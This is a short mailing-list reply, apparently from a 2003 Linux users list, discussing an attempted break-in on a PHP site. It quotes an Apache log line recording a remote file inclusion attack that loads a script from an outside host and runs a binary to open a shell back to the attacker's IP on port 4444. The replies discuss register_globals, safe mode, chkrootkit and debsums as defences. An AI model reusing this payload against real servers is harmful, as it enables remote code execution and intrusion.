> If you have register globals off *or* safe mode on, this particular > exploit is useless. > > If you had register globals on and safe mode off then he could run > arbitrary programs as your Apache user. It's possible he could run a > local root exploiting program, but that's not as likely. > > > 200.214.140.237 - - [15/Nov/2003:00:48:00 -0200] "GET > > /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./db%20200.214.140.237%204444 > > HTTP/1.1" 200 4112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 > > i686) Opera 7.11 [en]" > > I think the script is broken because that <db> file is not currently > found. > > It's a really stupid script, it could have all been done with one file > if he actually knew how to code PHP. > > How to tell if he got to root? The only really sure way is to use a > known-secure boot medium to examine every file on your filesystem that > might be run with root privileges... > > Or you can check to see if he made it easy for him to find with the > <chkrootkit> and <debsums> packages. There are probably better options > which people on this list could suggest. > > -- > Tom Goulet mail: [EMAIL PROTECTED] > UID0 Unix Consulting web: em.ca/uid0/
Sorry forgot to tell. The chkrootkit and the debsums all ok. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
